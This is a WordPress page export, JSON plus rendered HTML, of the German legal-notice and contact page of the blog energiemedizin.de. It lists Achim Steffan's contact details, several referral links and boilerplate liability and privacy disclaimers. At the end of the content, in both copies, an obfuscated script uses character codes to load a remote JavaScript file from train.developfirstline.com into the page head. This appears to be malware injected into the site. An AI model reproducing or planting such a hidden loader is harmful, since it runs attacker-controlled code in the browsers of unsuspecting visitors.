{"id":29,"date":"2010-10-29T11:06:25","date_gmt":"2010-10-29T09:06:25","guid":{"rendered":"http:\/\/energiemedizin.de\/blog\/?page_id=29"},"modified":"2017-08-09T07:50:35","modified_gmt":"2017-08-09T07:50:35","slug":"impressum-2","status":"publish","type":"page","link":"http:\/\/blog.energiemedizin.de\/?page_id=29","title":{"rendered":"Impressum &amp; Kontakt"},"content":{"rendered":"<h3><strong><span style=\"color: #000000;\">ENERGIEMEDIZIN &amp; GESUNDHEIT <\/span><a href=\"http:\/\/blog.energiemedizin.de\/?page_id=1268\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-5337\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/Passfoto-aktuell-klein.jpg\" alt=\"Passfoto aktuell klein\" width=\"169\" height=\"228\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/Passfoto-aktuell-klein.jpg 433w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/Passfoto-aktuell-klein-222x300.jpg 222w\" sizes=\"(max-width: 169px) 100vw, 169px\" \/><\/a><br \/>\n<\/strong><\/h3>\n<p><span style=\"color: #000000;\">Achim Steffan<\/span><br \/>\n<span style=\"color: #000000;\"> <a href=\"http:\/\/www.energiemedizin.de\/dateien_newsletter\/neways\/diplom_achim\" target=\"_blank\" rel=\"noopener\">Dipl. Networker (SNA)<\/a><br \/>\nSocial Marketer<br \/>\n<\/span><\/p>\n<p><span style=\"color: #000000;\">Feldberger Ring 76<\/span><br \/>\n<span style=\"color: #000000;\"> D &#8211; 12619 BERLIN<\/span><\/p>\n<p><span style=\"color: #000000;\">Ust.-IdNr.: DE 165899293<\/span><\/p>\n<p><span style=\"color: #000000;\">Tel.: +49(0)30 563 01 743<\/span><br \/>\n<span style=\"color: #000000;\"> Fax: +49 (0)3222 3442808<\/span><br \/>\n<span style=\"color: #000000;\"> Funk: +49(0)177 866 0025<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #000000;\"> <b><a href=\"http:\/\/perth.callback24.biz\/1583\" target=\"_blank\" rel=\"noopener\">Gratis-R\u00fcckruf<\/a><\/b><\/span><\/p>\n<p><span style=\"color: #000000;\"><a href=\"mailto:a.steffan@energiemedizin.de\" target=\"_blank\" rel=\"noopener\">eMail: a.steffan(at)energiemedizin.de<\/a><a style=\"color: #000000;\" href=\"mailto:a.steffan@energiemedizin.de\"><br \/>\n<\/a> Skype: perth44<br \/>\n<\/span><\/p>\n<p><a href=\"http:\/\/energiemedizin.de\" target=\"_blank\" rel=\"noopener\"><\/a><a href=\"https:\/\/www.modere.eu\/?referralCode=260249\" target=\"_blank\" rel=\"noopener\">https:\/\/modere.eu\/?referralCode=260249 <\/a><a href=\"http:\/\/602.fginfo24.com\/?lp=5\" target=\"_blank\" rel=\"noopener\"><br \/>\n<\/a><a href=\"http:\/\/steffan.aquion.de\/\" target=\"_blank\" rel=\"noopener\">http:\/\/steffan.aquion.de\/ <\/a><a href=\"http:\/\/perth44.fgxpress.com\/?lang=de#\/europe\" target=\"_blank\" rel=\"noopener\"><br \/>\nhttp:\/\/perth44.fgxpress.com\/?lang=de#\/europe<\/a><br \/>\n<a href=\"https:\/\/www.facebook.com\/emg.berlin\" target=\"_blank\" rel=\"noopener\">https:\/\/facebook.com\/emg.berlin<\/a><br \/>\n<a href=\"https:\/\/www.facebook.com\/achim.steffan\" target=\"_blank\" rel=\"noopener\">https:\/\/facebook.com\/achim.steffan<br \/>\nhttps:\/\/energiemedizingesundheit.i-like.net\/de\/<\/a><\/p>\n<p>&nbsp;<\/p>\n<p class=\"wpcf7-contact-form-not-found\"><strong>Fehler:<\/strong> Kontaktformular wurde nicht gefunden.<\/p>\n<h3><span style=\"color: #0000ff;\"><strong>Bitte f\u00fcr eventuelle R\u00fcckfragen Rufnummer angeben.<\/strong><\/span><\/h3>\n<h3><\/h3>\n<p>&nbsp;<\/p>\n<h3><span style=\"color: #000000;\">Verantwortlich f\u00fcr den Inhalt nach \u00a7 55 Abs. 2 RStV:<\/span><\/h3>\n<p><span style=\"color: #000000;\">Achim Steffan<\/span><br \/>\n<span style=\"color: #000000;\"> Feldberger Ring 76<\/span><br \/>\n<span style=\"color: #000000;\"> 12619 Berlin<\/span><\/p>\n<h3><span style=\"color: #000000;\">Haftungsausschluss (Disclaimer)<\/span><\/h3>\n<p><span style=\"color: #000000;\"><strong>Haftung f\u00fcr Inhalte<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Als Diensteanbieter sind wir gem\u00e4\u00df \u00a7 7 Abs.1 TMG f\u00fcr eigene Inhalte auf diesen Seiten nach den allgemeinen Gesetzen verantwortlich. Nach \u00a7\u00a7 8 bis 10 TMG sind wir als Diensteanbieter jedoch nicht verpflichtet, \u00fcbermittelte oder gespeicherte fremde Informationen zu \u00fcberwachen oder nach Umst\u00e4nden zu forschen, die auf eine rechtswidrige T\u00e4tigkeit hinweisen. Verpflichtungen zur Entfernung oder Sperrung der Nutzung von Informationen nach den allgemeinen Gesetzen bleiben hiervon unber\u00fchrt. Eine diesbez\u00fcgliche Haftung ist jedoch erst ab dem Zeitpunkt der Kenntnis einer konkreten Rechtsverletzung m\u00f6glich. Bei Bekanntwerden von entsprechenden Rechtsverletzungen werden wir diese Inhalte umgehend entfernen.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Haftung f\u00fcr Links<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Unser Angebot enth\u00e4lt Links zu externen Webseiten Dritter, auf deren Inhalte wir keinen Einfluss haben. Deshalb k\u00f6nnen wir f\u00fcr diese fremden Inhalte auch keine Gew\u00e4hr \u00fcbernehmen. F\u00fcr die Inhalte der verlinkten Seiten ist stets der jeweilige Anbieter oder Betreiber der Seiten verantwortlich. Die verlinkten Seiten wurden zum Zeitpunkt der Verlinkung auf m\u00f6gliche Rechtsverst\u00f6\u00dfe \u00fcberpr\u00fcft. Rechtswidrige Inhalte waren zum Zeitpunkt der Verlinkung nicht erkennbar. Eine permanente inhaltliche Kontrolle der verlinkten Seiten ist jedoch ohne konkrete Anhaltspunkte einer Rechtsverletzung nicht zumutbar. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Links umgehend entfernen.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Urheberrecht<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Die durch die Seitenbetreiber erstellten Inhalte und Werke auf diesen Seiten unterliegen dem deutschen Urheberrecht. Die Vervielf\u00e4ltigung, Bearbeitung, Verbreitung und jede Art der Verwertung au\u00dferhalb der Grenzen des Urheberrechtes bed\u00fcrfen der schriftlichen Zustimmung des jeweiligen Autors bzw. Erstellers. Downloads und Kopien dieser Seite sind nur f\u00fcr den privaten, nicht kommerziellen Gebrauch gestattet. Soweit die Inhalte auf dieser Seite nicht vom Betreiber erstellt wurden, werden die Urheberrechte Dritter beachtet. Insbesondere werden Inhalte Dritter als solche gekennzeichnet. Sollten Sie trotzdem auf eine Urheberrechtsverletzung aufmerksam werden, bitten wir um einen entsprechenden Hinweis. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Inhalte umgehend entfernen.<\/span><\/p>\n<h3><span style=\"color: #000000;\">Datenschutzerkl\u00e4rung:<\/span><\/h3>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #000000;\">Die Nutzung unserer Webseite ist in der Regel ohne Angabe personenbezogener Daten m\u00f6glich. Soweit auf unseren Seiten personenbezogene Daten (beispielsweise Name, Anschrift oder eMail-Adressen) erhoben werden, erfolgt dies, soweit m\u00f6glich, stets auf freiwilliger Basis. Diese Daten werden ohne Ihre ausdr\u00fcckliche Zustimmung nicht an Dritte weitergegeben.<\/span><\/p>\n<p><span style=\"color: #000000;\">Wir weisen darauf hin, dass die Daten\u00fcbertragung im Internet (z.B. bei der Kommunikation per E-Mail) Sicherheitsl\u00fccken aufweisen kann. Ein l\u00fcckenloser Schutz der Daten vor dem Zugriff durch Dritte ist nicht m\u00f6glich.<\/span><\/p>\n<p><span style=\"color: #000000;\">Der Nutzung von im Rahmen der Impressumspflicht ver\u00f6ffentlichten Kontaktdaten durch Dritte zur \u00dcbersendung von nicht ausdr\u00fccklich angeforderter Werbung und Informationsmaterialien wird hiermit ausdr\u00fccklich widersprochen. Die Betreiber der Seiten behalten sich ausdr\u00fccklich rechtliche Schritte im Falle der unverlangten Zusendung von Werbeinformationen, etwa durch Spam-Mails, vor.<\/span><\/p>\n<p><span style=\"color: #000000;\">Bei Fragen zur Erhebung, Verarbeitung oder Nutzung Ihrer personenbezogenen Daten sowie bei Ausk\u00fcnften, Berichtigung, Sperrung oder L\u00f6schung von Daten wenden Sie sich bitte an: Achim Steffan a.steffan(at)energiemedizin.de<\/span><\/p>\n<hr \/>\n<p><span style=\"color: #000000;\">Die Informationen auf dieser Webseite sind eine subjektive Sicht der Dinge, gepr\u00e4gt durch eigene Gedanken, eigene Erfahrungen und eigene Schlussfolgerungen. Wir (Blogbetreiber und Autoren, sowie Gast-Autoren) erheben somit keinen Anspruch auf Objektivit\u00e4t und damit auch keinen Anspruch auf die alleing\u00fcltige Wahrheit. Unsere Wahrheit (d.h. pers\u00f6nliche Erfahrungen und Erkenntnisse) muss nicht f\u00fcr andere Menschen g\u00fcltig sein.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Wir haben das Recht auf freie Meinungs\u00e4u\u00dferung:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Die Artikel und Inhalte von Gesundheitlicheaufklaerung.de stellen ausschlie\u00dflich <u>die pers\u00f6nliche Meinung<\/u> des Betreibers und der verschiedenen Autoren dar.<\/span><\/p>\n<p><span style=\"color: #000000;\">Aus <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/www.gesetze-im-internet.de\/gg\/art_5.html\">Artikel 5 Grundgesetz<\/a><\/span> f\u00fcr die Bundesrepublik Deutschland:<\/span><\/p>\n<ol>\n<li><span style=\"color: #000000;\"><em> Jeder hat das Recht, seine Meinung in Wort, Schrift und Bild frei zu \u00e4u\u00dfern und zu verbreiten und sich aus allgemein zug\u00e4nglichen Quellen ungehindert zu unterrichten. Die Pressefreiheit und die Freiheit der Berichterstattung durch Rundfunk und Film werden gew\u00e4hrleistet. Eine Zensur findet nicht statt.<\/em><\/span><\/li>\n<\/ol>\n<hr \/>\n<p><span style=\"font-family: Arial Narrow;\"><span style=\"color: #000000;\"><em>Die EU-Kommission wird im ersten Quartal 2016 eine Internetplattform zur Online-Beilegung von Streitigkeiten (sog. &#8222;OS-Plattform&#8220;) bereitstellen. Die OS-Plattform soll als Anlaufstelle<br \/>\nzur au\u00dfergerichtlichen Beilegung von Streitigkeiten betreffend vertragliche Verpflichtungen, die aus Online-Kaufvertr\u00e4gen erwachsen, dienen.<br \/>\nDie OS-Plattform wird unter folgendem Link erreichbar sein: <\/em><\/span><a href=\"http:\/\/ec.europa.eu\/consumers\/odr\"><em>http:\/\/ec.europa.eu\/consumers\/odr<\/em><\/a><\/span><\/p>\n<hr \/>\n<p>&nbsp;<\/p>\n<p>&nbsp;<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ENERGIEMEDIZIN &amp; GESUNDHEIT Achim Steffan Dipl. Networker (SNA) Social Marketer Feldberger Ring 76 D &#8211; 12619 BERLIN Ust.-IdNr.: DE 165899293 Tel.: +49(0)30 563 01 743 Fax: +49 (0)3222 3442808 Funk: +49(0)177 866 0025 Gratis-R\u00fcckruf eMail: a.steffan(at)energiemedizin.de Skype: perth44 https:\/\/modere.eu\/?referralCode=260249 http:\/\/steffan.aquion.de\/ http:\/\/perth44.fgxpress.com\/?lang=de#\/europe https:\/\/facebook.com\/emg.berlin https:\/\/facebook.com\/achim.steffan https:\/\/energiemedizingesundheit.i-like.net\/de\/ &nbsp; Bitte f\u00fcr eventuelle R\u00fcckfragen Rufnummer angeben. &nbsp; Verantwortlich f\u00fcr den [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":9,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/29"}],"collection":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29"}],"version-history":[{"count":10,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/29\/revisions"}],"predecessor-version":[{"id":6382,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/29\/revisions\/6382"}],"wp:attachment":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<h3><strong><span style="color: #000000;">ENERGIEMEDIZIN &amp; GESUNDHEIT </span><a href="http://blog.energiemedizin.de/?page_id=1268" target="_blank" rel="noopener"><img decoding="async" loading="lazy" class="alignright wp-image-5337" src="http://blog.energiemedizin.de/wp-content/uploads/2011/03/Passfoto-aktuell-klein.jpg" alt="Passfoto aktuell klein" width="169" height="228" srcset="http://blog.energiemedizin.de/wp-content/uploads/2011/03/Passfoto-aktuell-klein.jpg 433w, http://blog.energiemedizin.de/wp-content/uploads/2011/03/Passfoto-aktuell-klein-222x300.jpg 222w" sizes="(max-width: 169px) 100vw, 169px" /></a><br />
</strong></h3>
<p><span style="color: #000000;">Achim Steffan</span><br />
<span style="color: #000000;"> <a href="http://www.energiemedizin.de/dateien_newsletter/neways/diplom_achim" target="_blank" rel="noopener">Dipl. Networker (SNA)</a><br />
Social Marketer<br />
</span></p>
<p><span style="color: #000000;">Feldberger Ring 76</span><br />
<span style="color: #000000;"> D &#8211; 12619 BERLIN</span></p>
<p><span style="color: #000000;">Ust.-IdNr.: DE 165899293</span></p>
<p><span style="color: #000000;">Tel.: +49(0)30 563 01 743</span><br />
<span style="color: #000000;"> Fax: +49 (0)3222 3442808</span><br />
<span style="color: #000000;"> Funk: +49(0)177 866 0025</span></p>
<p><span style="font-family: Arial; color: #000000;"> <b><a href="http://perth.callback24.biz/1583" target="_blank" rel="noopener">Gratis-Rückruf</a></b></span></p>
<p><span style="color: #000000;"><a href="mailto:a.steffan@energiemedizin.de" target="_blank" rel="noopener">eMail: a.steffan(at)energiemedizin.de</a><a style="color: #000000;" href="mailto:a.steffan@energiemedizin.de"><br />
</a> Skype: perth44<br />
</span></p>
<p><a href="http://energiemedizin.de" target="_blank" rel="noopener"></a><a href="https://www.modere.eu/?referralCode=260249" target="_blank" rel="noopener">https://modere.eu/?referralCode=260249 </a><a href="http://602.fginfo24.com/?lp=5" target="_blank" rel="noopener"><br />
</a><a href="http://steffan.aquion.de/" target="_blank" rel="noopener">http://steffan.aquion.de/ </a><a href="http://perth44.fgxpress.com/?lang=de#/europe" target="_blank" rel="noopener"><br />
http://perth44.fgxpress.com/?lang=de#/europe</a><br />
<a href="https://www.facebook.com/emg.berlin" target="_blank" rel="noopener">https://facebook.com/emg.berlin</a><br />
<a href="https://www.facebook.com/achim.steffan" target="_blank" rel="noopener">https://facebook.com/achim.steffan<br />
https://energiemedizingesundheit.i-like.net/de/</a></p>
<p>&nbsp;</p>
<p class="wpcf7-contact-form-not-found"><strong>Fehler:</strong> Kontaktformular wurde nicht gefunden.</p>
<h3><span style="color: #0000ff;"><strong>Bitte für eventuelle Rückfragen Rufnummer angeben.</strong></span></h3>
<h3></h3>
<p>&nbsp;</p>
<h3><span style="color: #000000;">Verantwortlich für den Inhalt nach § 55 Abs. 2 RStV:</span></h3>
<p><span style="color: #000000;">Achim Steffan</span><br />
<span style="color: #000000;"> Feldberger Ring 76</span><br />
<span style="color: #000000;"> 12619 Berlin</span></p>
<h3><span style="color: #000000;">Haftungsausschluss (Disclaimer)</span></h3>
<p><span style="color: #000000;"><strong>Haftung für Inhalte</strong></span></p>
<p><span style="color: #000000;">Als Diensteanbieter sind wir gemäß § 7 Abs.1 TMG für eigene Inhalte auf diesen Seiten nach den allgemeinen Gesetzen verantwortlich. Nach §§ 8 bis 10 TMG sind wir als Diensteanbieter jedoch nicht verpflichtet, übermittelte oder gespeicherte fremde Informationen zu überwachen oder nach Umständen zu forschen, die auf eine rechtswidrige Tätigkeit hinweisen. Verpflichtungen zur Entfernung oder Sperrung der Nutzung von Informationen nach den allgemeinen Gesetzen bleiben hiervon unberührt. Eine diesbezügliche Haftung ist jedoch erst ab dem Zeitpunkt der Kenntnis einer konkreten Rechtsverletzung möglich. Bei Bekanntwerden von entsprechenden Rechtsverletzungen werden wir diese Inhalte umgehend entfernen.</span></p>
<p><span style="color: #000000;"><strong>Haftung für Links</strong></span></p>
<p><span style="color: #000000;">Unser Angebot enthält Links zu externen Webseiten Dritter, auf deren Inhalte wir keinen Einfluss haben. Deshalb können wir für diese fremden Inhalte auch keine Gewähr übernehmen. Für die Inhalte der verlinkten Seiten ist stets der jeweilige Anbieter oder Betreiber der Seiten verantwortlich. Die verlinkten Seiten wurden zum Zeitpunkt der Verlinkung auf mögliche Rechtsverstöße überprüft. Rechtswidrige Inhalte waren zum Zeitpunkt der Verlinkung nicht erkennbar. Eine permanente inhaltliche Kontrolle der verlinkten Seiten ist jedoch ohne konkrete Anhaltspunkte einer Rechtsverletzung nicht zumutbar. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Links umgehend entfernen.</span></p>
<p><span style="color: #000000;"><strong>Urheberrecht</strong></span></p>
<p><span style="color: #000000;">Die durch die Seitenbetreiber erstellten Inhalte und Werke auf diesen Seiten unterliegen dem deutschen Urheberrecht. Die Vervielfältigung, Bearbeitung, Verbreitung und jede Art der Verwertung außerhalb der Grenzen des Urheberrechtes bedürfen der schriftlichen Zustimmung des jeweiligen Autors bzw. Erstellers. Downloads und Kopien dieser Seite sind nur für den privaten, nicht kommerziellen Gebrauch gestattet. Soweit die Inhalte auf dieser Seite nicht vom Betreiber erstellt wurden, werden die Urheberrechte Dritter beachtet. Insbesondere werden Inhalte Dritter als solche gekennzeichnet. Sollten Sie trotzdem auf eine Urheberrechtsverletzung aufmerksam werden, bitten wir um einen entsprechenden Hinweis. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Inhalte umgehend entfernen.</span></p>
<h3><span style="color: #000000;">Datenschutzerklärung:</span></h3>
<p>&nbsp;</p>
<p><span style="color: #000000;">Die Nutzung unserer Webseite ist in der Regel ohne Angabe personenbezogener Daten möglich. Soweit auf unseren Seiten personenbezogene Daten (beispielsweise Name, Anschrift oder eMail-Adressen) erhoben werden, erfolgt dies, soweit möglich, stets auf freiwilliger Basis. Diese Daten werden ohne Ihre ausdrückliche Zustimmung nicht an Dritte weitergegeben.</span></p>
<p><span style="color: #000000;">Wir weisen darauf hin, dass die Datenübertragung im Internet (z.B. bei der Kommunikation per E-Mail) Sicherheitslücken aufweisen kann. Ein lückenloser Schutz der Daten vor dem Zugriff durch Dritte ist nicht möglich.</span></p>
<p><span style="color: #000000;">Der Nutzung von im Rahmen der Impressumspflicht veröffentlichten Kontaktdaten durch Dritte zur Übersendung von nicht ausdrücklich angeforderter Werbung und Informationsmaterialien wird hiermit ausdrücklich widersprochen. Die Betreiber der Seiten behalten sich ausdrücklich rechtliche Schritte im Falle der unverlangten Zusendung von Werbeinformationen, etwa durch Spam-Mails, vor.</span></p>
<p><span style="color: #000000;">Bei Fragen zur Erhebung, Verarbeitung oder Nutzung Ihrer personenbezogenen Daten sowie bei Auskünften, Berichtigung, Sperrung oder Löschung von Daten wenden Sie sich bitte an: Achim Steffan a.steffan(at)energiemedizin.de</span></p>
<hr />
<p><span style="color: #000000;">Die Informationen auf dieser Webseite sind eine subjektive Sicht der Dinge, geprägt durch eigene Gedanken, eigene Erfahrungen und eigene Schlussfolgerungen. Wir (Blogbetreiber und Autoren, sowie Gast-Autoren) erheben somit keinen Anspruch auf Objektivität und damit auch keinen Anspruch auf die alleingültige Wahrheit. Unsere Wahrheit (d.h. persönliche Erfahrungen und Erkenntnisse) muss nicht für andere Menschen gültig sein.</span></p>
<p><span style="color: #000000;"><strong>Wir haben das Recht auf freie Meinungsäußerung:</strong></span></p>
<p><span style="color: #000000;">Die Artikel und Inhalte von Gesundheitlicheaufklaerung.de stellen ausschließlich <u>die persönliche Meinung</u> des Betreibers und der verschiedenen Autoren dar.</span></p>
<p><span style="color: #000000;">Aus <span style="color: #3366ff;"><a style="color: #3366ff;" href="http://www.gesetze-im-internet.de/gg/art_5.html">Artikel 5 Grundgesetz</a></span> für die Bundesrepublik Deutschland:</span></p>
<ol>
<li><span style="color: #000000;"><em> Jeder hat das Recht, seine Meinung in Wort, Schrift und Bild frei zu äußern und zu verbreiten und sich aus allgemein zugänglichen Quellen ungehindert zu unterrichten. Die Pressefreiheit und die Freiheit der Berichterstattung durch Rundfunk und Film werden gewährleistet. Eine Zensur findet nicht statt.</em></span></li>
</ol>
<hr />
<p><span style="font-family: Arial Narrow;"><span style="color: #000000;"><em>Die EU-Kommission wird im ersten Quartal 2016 eine Internetplattform zur Online-Beilegung von Streitigkeiten (sog. &#8222;OS-Plattform&#8220;) bereitstellen. Die OS-Plattform soll als Anlaufstelle<br />
zur außergerichtlichen Beilegung von Streitigkeiten betreffend vertragliche Verpflichtungen, die aus Online-Kaufverträgen erwachsen, dienen.<br />
Die OS-Plattform wird unter folgendem Link erreichbar sein: </em></span><a href="http://ec.europa.eu/consumers/odr"><em>http://ec.europa.eu/consumers/odr</em></a></span></p>
<hr />
<p>&nbsp;</p>
<p>&nbsp;<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></p>

<p>ENERGIEMEDIZIN &amp; GESUNDHEIT Achim Steffan Dipl. Networker (SNA) Social Marketer Feldberger Ring 76 D &#8211; 12619 BERLIN Ust.-IdNr.: DE 165899293 Tel.: +49(0)30 563 01 743 Fax: +49 (0)3222 3442808 Funk: +49(0)177 866 0025 Gratis-Rückruf eMail: a.steffan(at)energiemedizin.de Skype: perth44 https://modere.eu/?referralCode=260249 http://steffan.aquion.de/ http://perth44.fgxpress.com/?lang=de#/europe https://facebook.com/emg.berlin https://facebook.com/achim.steffan https://energiemedizingesundheit.i-like.net/de/ &nbsp; Bitte für eventuelle Rückfragen Rufnummer angeben. &nbsp; Verantwortlich für den [&hellip;]</p>
